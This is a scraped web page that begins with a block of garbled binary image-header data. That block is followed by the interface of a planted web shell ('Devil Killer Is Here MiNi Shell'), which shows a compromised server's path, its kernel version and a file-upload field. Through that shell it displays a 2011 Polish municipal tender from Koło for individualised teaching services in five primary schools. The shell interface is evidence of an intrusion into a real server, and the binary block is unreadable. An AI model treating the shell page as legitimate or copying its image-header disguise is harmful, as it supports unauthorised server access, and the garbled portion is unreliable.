JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110217/24502-N-2011.html

<p class="kh_header"><b>Koło: PRZEPROWADZENIE ZAJĘĆ DOTYCZACYCH INDYWIDUALIZACJI NAUCZANIA UCZNIÓW I UCZENNIC W KLASACH I-III SZKÓŁ PODSTAWOWYCH W RAMACH POSZCZEGÓLNYCH ZADAŃ:

1)	ZADANIE NR 1 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 1,
2)	ZADANIE NR 2 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 2.
3)	ZADANIE NR 3 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 3.
4)	ZADANIE NR 4 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 4.
5)	ZADANIE NR 5 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 5.</b><br>
<b>Numer ogłoszenia: 24502 - 2011; data zamieszczenia: 17.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Koło , ul. Mickiewicza 12, 62-600 Koło, woj. wielkopolskie, tel. 063 2610252, 2610230, faks 063 2722984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kolo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE ZAJĘĆ DOTYCZACYCH INDYWIDUALIZACJI NAUCZANIA UCZNIÓW I UCZENNIC W KLASACH I-III SZKÓŁ PODSTAWOWYCH W RAMACH POSZCZEGÓLNYCH ZADAŃ:

1)	ZADANIE NR 1 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 1,
2)	ZADANIE NR 2 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 2.
3)	ZADANIE NR 3 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 3.
4)	ZADANIE NR 4 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 4.
5)	ZADANIE NR 5 -	USŁUGA EDUKACYJNA DLA UCZNIÓW SZKOŁY  				PODSTAWOWEJ NR 5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia wg Wspólnego Słownika Zamówień sklasyfikowany został jako CPV- 80.10.00.00-5 (usługi szkolnictwa podstawowego) i obejmuje pięć odrębnych zadań:
Przedmiotem zamówienia jest usługa edukacyjna dla uczniów Szkoły Podstawowej nr 1 im. Stanisława Konarskiego w Kole, Szkoły Podstawowej nr 2 im. Adama Mickiewicza w Kole, Szkoły Podstawowej nr 3 im. Marii Konopnickiej w Kole, Szkoły Podstawowej nr 4 im. Kawalerów Orderu Uśmiechu w Kole,  Szkoły Podstawowej nr 5 im. Arkadego Fiedlera w Kole oraz dostawa sprzętu, pomocy dydaktycznych i wyposażenia do Szkoły Podstawowej nr 2 im. Adama Mickiewicza  w Kole, Szkoły Podstawowej nr 3 im. Marii Konopnickiej w Kole, Szkoły Podstawowej nr 4 im. Kawalerów Orderu Uśmiechu w Kole w ramach realizacji projektu pn.: Indywidualizacja nauczania - szansą dla każdego. Projekt dofinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
Głównym celem projektu jest wyrównywanie szans edukacyjnych uczniów poprzez indywidualizację procesu kształcenia dzieci z klas I-III.

Prowadzący zajęcia dodatkowe będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dla uczniów, działania dostosowywane będą do potrzeb uczniów, w ramach indywidualizacji zajęć. 

Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji - niwelowanie trudności i niepowodzeń szkolnych dziecka poprzez usprawnianie: zaburzonych funkcji percepcyjno - motorycznych, zaburzeń pamięci (wzrokowej, słuchowej i ruchowej), zaburzeń lateralizacji oraz orientacji. 
Prowadzenie zajęć logopedycznych korygujące wady wymowy -  kształcenie, rozwijanie i doskonalenie umiejętności komunikowania się z otoczeniem. Stymulacja rozwoju językowego uczniów z uwzględnieniem wszystkich aspektów mowy (wymowa, słownictwo, strona  gramatyczna i stylistyczna).

Prowadzenie zajęć - gimnastyka korekcyjnej dla dzieci z wadami postaw mającej na celu usprawnienie motoryki uczestników - wytworzenie u uczniów nawyku utrzymania prawidłowej postawy i umiejętne stosowanie go w życiu codziennym. Poznanie prawidłowej sylwetki, uświadomienie i umotywowanie uczniom potrzeby uczestnictwa w zajęciach, poznanie podstawowych przyczyn i skutków powstawania wad postawy, kształtowanie prawidłowej postawy ciała, utrwalanie nawyku przyjmowania prawidłowej postawy podczas ćwiczeń, wzmacnianie osłabionych partii mięśniowych, rozciąganie mięśni przykurczonych, utrwalanie nawyku prawidłowego oddychania, poznanie i nabycie umiejętności ruchowych z zakresu gimnastyki korekcyjnej i wykorzystanie ich w życiu codziennym, wyrobienie u uczniów poczucia odpowiedzialności za swoje zdrowie, kontrola i samokontrola wykonywanych ćwiczeń i utrzymania prawidłowej postawy.

Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - uzupełnianie braków w wiadomościach uczniów oraz opanowanie podstawowych umiejętności w zakresie zaburzonych procesów odgrywających istotną rolę w opanowaniu podstawowych umiejętności matematycznych, oddziaływanie ogólnie uspokajające, budujące odporność emocjonalną, aktywizujące dziecko do nauki. 

Prowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych (np. prowadzenie obserwacji przyrodniczych) - kształtowanie poczucia odpowiedzialności za otaczające środowisko. Należy uwrażliwić uczniów na piękno przyrody, na znaczenie czystego środowiska dla ich zdrowia oraz uzmysłowić im, iż sami mogą przyczynić się do zmniejszenia dewastacji środowiska. Zajęcia mają również  służyć rozwijaniu umiejętności logicznego myślenia, aktywności matematycznej uczniów oraz ich zaangażowaniu w proces dydaktyczny. Obliczenia matematyczne ustne i pisemne, rozwijają umiejętności wypowiadania, czytania i pisania. W celu wdrażania dzieci do ścisłego i poprawnego wyrażania się zalecane jest przestrzeganie dokładności w ustnym opisie czynności matematycznych wykonywanych przez dziecko.
Prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych matematycznie (prowadzenie zajęć koła matematycznego). Rozwijanie zainteresowań matematycznych, rozwijanie wyobraźni ucznia, umiejętności twórczego i logicznego myślenia, wdrażanie ucznia do samodzielnej pracy i doskonalenie własnych metod uczenia się, zapoznanie ucznia z zastosowaniem matematyki. 
Prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie (prowadzenie zajęć chóru szkolnego i zespołu muzycznego) zajęcia mają na celu rozwijanie zdolności muzycznych u dzieci, budzenie wyobraźni ruchowo-przestrzennej. Kształcenie umiejętności  prawidłowego posługiwania się aparatem głosowym, osiąganie coraz wyższego poziomu artystycznego, stymulowanie różnych form aktywności twórczej, rozwijanie umiejętności śpiewu wielogłosowego, kształcenie umiejętności korzystania z mikrofonu i zachowania się na scenie. Budzenie i rozwijanie takich cech jak: systematyczność, pracowitość, dokładność, obowiązkowość, dyscyplina.

Prowadzenie zajęć socjoterapeutycznych i psychoedukacyjnych dla dzieci z zaburzeniami komunikacji społecznej - rozszerzenie u uczniów kompetencji w zakresie umiejętności psychospołecznych, poprawa społecznego i emocjonalnego funkcjonowania dzieci oraz nauka nowych umiejętności społecznych rozumianych jako: nauka pracy w grupie, nauka podejmowania decyzji, budowanie poczucia własnej wartości, poznawanie przez dzieci swoich mocnych stron, budowanie pozytywnego obrazu siebie, doskonalenie umiejętności komunikowana się z innymi, nabycie umiejętności rozwiązywania konfliktów, rozpoznawania i wyrażania emocji, nauka wychodzenia z ról niekorzystnych dla dzieci, rozwijanie zdolności akceptacji siebie i innych oraz empatii, rozwijanie asertywności, uczenie się mówienia nie, nauka spostrzegania zagrożeń, zapobiegania uzależnieniom i agresji, poznanie przez dzieci metod radzenia sobie w sytuacjach trudnych, nauka umiejętności radzenia sobie ze stresem, stworzenie możliwości odreagowania napięć oraz wyzwalania emocji,

Prowadzenie zajęć specjalistycznych - zajęcia terapeutyczne: terapia zajęciowa, które przyczynią się do podniesienie poczucia własnej wartości ucznia, usprawnienie komunikacji  z otoczeniem, wyzwalanie właściwych postaw i emocji, rozwój zainteresowań i zdolności, kształtowanie właściwych postaw wobec pracy, zaspokojenie potrzeb znaczenia i akceptacji, utrzymanie dobrej kondycji fizycznej uczestników, podniesienie ogólnej sprawności fizycznej, wypracowanie umiejętności inicjowania i podtrzymywania rozmowy, wpojenie zasad współżycia społecznego, rozwój myślenia logicznego, wypracowanie umiejętności samodzielnego podejmowania decyzji.

Prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych (edukacja regionalna) - wyposażenie ucznia w podstawowy zasób wiedzy o własnej miejscowości i regionie, rozwijanie u ucznia wartości rodzinnych związanych z wartościami kulturowymi wspólnoty lokalnej, określanie przynależności kulturowych poprzez kontakt z wybranymi placówkami kultury, zabytkami i z tradycją w środowisku rodzinnym, szkolnym i lokalnym, rozwijanie postaw patriotycznych związanych z tożsamością kultury regionalnej, kształcenie umiejętności skutecznego komunikowania się z otoczeniem, rozwijanie samodzielności, obowiązkowości, zainteresowań i uzdolnień, przysposabianie do uczestnictwa w kulturze.

Prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie - zajęcia plastyczno - teatralne - zapewnienie dziecku warunków do wszechstronnego rozwoju zainteresowań, uzdolnień, rozwoju osobowości i umiejętności. Jako podstawę wszelkich działań przyjmuje się aktywność dziecka. Poprzez różnorodność metod oddziaływania oraz dobór treści obejmują wszystkie sfery aktywności: poznawczą, emocjonalną, społeczną i motoryczną.
Prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie. Głównym celem zajęć jest wzbogacenie wszechstronnego rozwoju osobowości dzieci poprzez kształcące i wychowawcze wartości działań plastycznych, muzycznych i teatralnych. Rozwijanie ekspresji werbalnej, plastycznej i muzycznej. Wdrażanie do odpowiedzialności i obowiązkowości. Utrwalanie umiejętności odgrywania ról z zachowaniem prawidłowej mimiki twarzy, intonacji głosu, dykcji. Wypracowanie różnorodnych sposobów radzenia sobie z tremą. Rozwijanie pamięci, myślenia, wyobraźni. Kształtowanie umiejętności wyrażania i nazywania emocji. Poznanie podstawowych pojęć związanych z teatrem.

Obowiązki prowadzącego zajęcia pozalekcyjne: 

a)	prowadzenie zajęć pozalekcyjnych (podział godzin w zależności od części), w terminie maksymalnym do 14 czerwca 2013 r.,
b)	 dokumentowanie zajęć pozalekcyjnych (kart czasu pracy, dzienników zajęć, list obecności), 
c)	mierzenie rezultatów na początku i na końcu trwania zajęć (rezultaty mierzone będą za pomocą wywiadów, ankiet, testów kompetencyjnych),
d)	pomoc dyrektorowi szkoły w której prowadzone są zajęcia w przygotowywaniu sprawozdań miesięcznych z realizacji zajęć poprzez sporządzanie sprawozdań,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować dysponowanie na podstawie umowy o pracę, umowy cywilnoprawnej lub pisemnego zobowiązania innego podmiot, o którym mowa jest w Załączniku Nr 3 do SIWZ osobami, które posiadają uprawnienia niezbędne do realizacji usług objętych przedmiotem zamówienia publicznego, w zakresie zgodności wykształcenia z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych  od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r.Nr 50, poz. 400) tj:

a)	Każdy wykonawca usługi powinien posiadać stopień awansu zawodowego minimum nauczyciela kontraktowego.
b)	Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące wykształcenia:

-	zadanie nr 1 część zamówienia nr 1 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach  I - III szkoły podstawowej, część zamówienia nr 2 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 3 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego i uprawnienia do prowadzenia gimnastyki korekcyjnej  lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe w zakresie gimnastyki korekcyjnej, część zamówienia nr 4 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I - III szkoły podstawowej, część zamówienia nr 5 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 6 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej. 

-	Zadanie nr 2 część zamówienia nr 7 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 8 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 9 wykształcenie wyższe magisterskie w zakresie logopedii oraz posiada przygotowanie pedagogiczne lub studia magisterskie na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne, część zamówienia nr 10 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego i uprawnienia do prowadzenia gimnastyki korekcyjnej  lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe w zakresie gimnastyki korekcyjnej, część zamówienia nr 11 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej. 

-	Zadanie nr 3 część zamówienia nr 12 wykształcenie wyższe magisterskie w zakresie logopedii oraz posiada przygotowanie pedagogiczne lub studia magisterskie na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne, część zamówienia nr 13 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie psychopedagogiki, studia podyplomowe w zakresie oligofrenopedagogiki, część zamówienia nr 14 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego i uprawnienia do prowadzenia gimnastyki korekcyjnej  lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe w zakresie gimnastyki korekcyjnej, część zamówienia nr 15 wykształcenie wyższe magisterskie pedagogika specjalna w zakresie oligofrenopedagogiki z terapią zajęciową, kurs kwalifikacyjny z terapii pedagogicznej, część zamówienia nr 16 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I - III szkoły podstawowej. 

-	Zadanie nr 4 część zamówienia nr 17  wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I - III szkoły podstawowej, część zamówienia nr 18 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 19 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego i uprawnienia do prowadzenia gimnastyki korekcyjnej  lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe w zakresie gimnastyki korekcyjnej, część zamówienia nr 20 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach  I - III szkoły podstawowej, część zamówienia nr 21 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 22 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej 

-	Zadanie nr 5 część zamówienia nr 23 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I - III szkoły podstawowej, część zamówienia nr 24 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia  nr 25 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego i uprawnienia do prowadzenia gimnastyki korekcyjnej  lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe w zakresie gimnastyki korekcyjnej, część zamówienia nr 26 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej, część zamówienia nr 27 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej,  część zamówienia nr 28  wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania  w klasach I - III szkoły podstawowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zobowiązanie do współpracy, pełnomocnictwo do podpisania oferty jeżeli  upoważnienie nie wynika z załączonych dokumentów,pełnomocnictwo do składania oferty wspólnej wg.  art 23 ust 2, jeżeli jest wymagane</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

